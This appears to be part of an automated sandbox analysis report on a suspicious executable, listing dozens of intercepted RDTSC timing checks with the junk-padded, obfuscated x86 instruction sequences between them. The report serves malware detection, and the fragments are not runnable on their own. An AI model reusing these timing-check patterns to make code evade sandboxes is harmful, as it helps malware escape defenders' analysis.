                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: DE937E second address: DE8C4A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36B8869BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b stc 0x0000000c pushad 0x0000000d xor ebx, dword ptr [ebp+122D2CF3h] 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D29CFh], ecx 0x0000001a jmp 00007F36B8869C08h 0x0000001f popad 0x00000020 popad 0x00000021 push dword ptr [ebp+122D0E79h] 0x00000027 jnc 00007F36B8869C00h 0x0000002d call dword ptr [ebp+122D1BAAh] 0x00000033 pushad 0x00000034 pushad 0x00000035 cld 0x00000036 or dh, FFFFFFB5h 0x00000039 popad 0x0000003a xor eax, eax 0x0000003c jmp 00007F36B8869C08h 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 cld 0x00000046 mov dword ptr [ebp+122D2B07h], eax 0x0000004c jmp 00007F36B8869C09h 0x00000051 mov esi, 0000003Ch 0x00000056 xor dword ptr [ebp+122D27A0h], ecx 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 ja 00007F36B8869BFEh 0x00000066 lodsw 0x00000068 jmp 00007F36B8869C09h 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F36B8869BFFh 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jmp 00007F36B8869C00h 0x0000007f nop 0x00000080 push edi 0x00000081 jnc 00007F36B8869BF8h 0x00000087 pop edi 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c pushad 0x0000008d popad 0x0000008e jp 00007F36B8869BF6h 0x00000094 popad 0x00000095 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F68F2F second address: F68F37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F54CE2 second address: F54D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F36B8869C07h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F54D05 second address: F54D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F54D09 second address: F54D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F36B8869BFCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F54D21 second address: F54D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F54D25 second address: F54D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F54D33 second address: F54D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jbe 00007F36B8D8D086h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F68251 second address: F68261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F68261 second address: F68266 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F68266 second address: F6827E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F36B8869BFAh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6827E second address: F68282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F68282 second address: F68288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6BCE1 second address: F6BDC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007F36B8D8D099h 0x00000015 pop eax 0x00000016 pushad 0x00000017 ja 00007F36B8D8D086h 0x0000001d jmp 00007F36B8D8D099h 0x00000022 popad 0x00000023 popad 0x00000024 nop 0x00000025 push 00000000h 0x00000027 jmp 00007F36B8D8D094h 0x0000002c call 00007F36B8D8D089h 0x00000031 pushad 0x00000032 jmp 00007F36B8D8D092h 0x00000037 jmp 00007F36B8D8D08Eh 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F36B8D8D08Bh 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 jc 00007F36B8D8D0A1h 0x0000004d mov eax, dword ptr [eax] 0x0000004f jng 00007F36B8D8D092h 0x00000055 jno 00007F36B8D8D08Ch 0x0000005b mov dword ptr [esp+04h], eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F36B8D8D08Bh 0x00000066 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6BDC5 second address: F6BDCF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F36B8869BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6BDCF second address: F6BE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 and esi, 6B5CC3F8h 0x0000000d sub dword ptr [ebp+122D2286h], ecx 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F36B8D8D088h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2A09h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F36B8D8D088h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov di, 050Bh 0x00000055 push 00000003h 0x00000057 sub dword ptr [ebp+122D2286h], ecx 0x0000005d call 00007F36B8D8D089h 0x00000062 push esi 0x00000063 pushad 0x00000064 jc 00007F36B8D8D086h 0x0000006a ja 00007F36B8D8D086h 0x00000070 popad 0x00000071 pop esi 0x00000072 push eax 0x00000073 jmp 00007F36B8D8D08Fh 0x00000078 mov eax, dword ptr [esp+04h] 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F36B8D8D097h 0x00000083 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6BE7D second address: F6BE82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6BE82 second address: F6BE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F36B8D8D086h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jl 00007F36B8D8D094h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6BF31 second address: F6BF5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jne 00007F36B8869BF6h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D27A0h], edi 0x00000017 push A6F0F661h 0x0000001c je 00007F36B8869C04h 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F36B8869BF6h 0x0000002a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6C088 second address: F6C08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F6C08D second address: F6C168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D2BFBh] 0x00000012 push 00000000h 0x00000014 mov edx, dword ptr [ebp+122D2AF3h] 0x0000001a push EC9B869Eh 0x0000001f jnp 00007F36B8869BFEh 0x00000025 add dword ptr [esp], 136479E2h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F36B8869BF8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D27A0h], eax 0x0000004c push 00000003h 0x0000004e call 00007F36B8869BFBh 0x00000053 xor dword ptr [ebp+122D183Dh], esi 0x00000059 pop ecx 0x0000005a push 00000000h 0x0000005c call 00007F36B8869BFBh 0x00000061 mov di, bx 0x00000064 pop esi 0x00000065 push 00000003h 0x00000067 stc 0x00000068 push 90C3714Dh 0x0000006d push esi 0x0000006e push ecx 0x0000006f jmp 00007F36B8869C05h 0x00000074 pop ecx 0x00000075 pop esi 0x00000076 add dword ptr [esp], 2F3C8EB3h 0x0000007d jl 00007F36B8869BFCh 0x00000083 lea ebx, dword ptr [ebp+12456BDDh] 0x00000089 or dword ptr [ebp+122D2252h], esi 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 jnl 00007F36B8869BF8h 0x00000098 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8AFFC second address: F8B004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B45A second address: F8B469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F36B8869BF6h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B469 second address: F8B477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F36B8D8D086h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B477 second address: F8B47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B47B second address: F8B48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B48D second address: F8B496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B496 second address: F8B4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F36B8D8D08Ch 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B4AC second address: F8B4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B5F0 second address: F8B609 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F36B8D8D08Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8B609 second address: F8B60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8BA1B second address: F8BA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F36B8D8D086h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8BCDA second address: F8BCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F36B8869BF6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8BCE5 second address: F8BD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pushad 0x00000008 jmp 00007F36B8D8D098h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8BD12 second address: F8BD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jng 00007F36B8869C1Ch 0x0000000d jp 00007F36B8869BFCh 0x00000013 jc 00007F36B8869BF6h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8BD2F second address: F8BD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D08Ah 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C015 second address: F8C01D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C01D second address: F8C022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C022 second address: F8C02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C02A second address: F8C046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F36B8D8D093h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C046 second address: F8C04C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C1A8 second address: F8C1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C1AC second address: F8C1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8C996 second address: F8C9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F36B8D8D086h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F8CAEE second address: F8CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F91D10 second address: F91D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D092h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F91D2B second address: F91D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F91EAF second address: F91EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F91EB4 second address: F91EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F36B8869C03h 0x00000011 jbe 00007F36B8869BF6h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F906C5 second address: F906E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F36B8D8D086h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F90EBB second address: F90EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F90EC1 second address: F90ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D08Dh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F92007 second address: F92016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F93256 second address: F9325A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9325A second address: F93260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F93260 second address: F93266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F63C16 second address: F63C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F63C1C second address: F63C22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9A319 second address: F9A31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F581D0 second address: F581D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F581D6 second address: F581DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F581DA second address: F581E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F581E6 second address: F581EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F998CF second address: F998DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F36B8D8D086h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99A33 second address: F99A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99A37 second address: F99A4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F36B8D8D08Ch 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99A4B second address: F99A82 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F36B8869C1Ah 0x00000008 jmp 00007F36B8869C04h 0x0000000d jmp 00007F36B8869C00h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F36B8869BF6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99E93 second address: F99E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99E97 second address: F99ED6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36B8869BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F36B8869C08h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F36B8869C05h 0x0000001a jmp 00007F36B8869BFFh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99ED6 second address: F99EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D092h 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F99EED second address: F99EF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9A05C second address: F9A07B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F36B8D8D086h 0x00000009 jbe 00007F36B8D8D086h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jnc 00007F36B8D8D086h 0x00000017 jg 00007F36B8D8D086h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9C316 second address: F9C31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9C31B second address: F9C320 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9C452 second address: F9C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9C5B9 second address: F9C5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F36B8D8D086h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9C911 second address: F9C915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D062 second address: F9D066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9D066 second address: F9D06A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
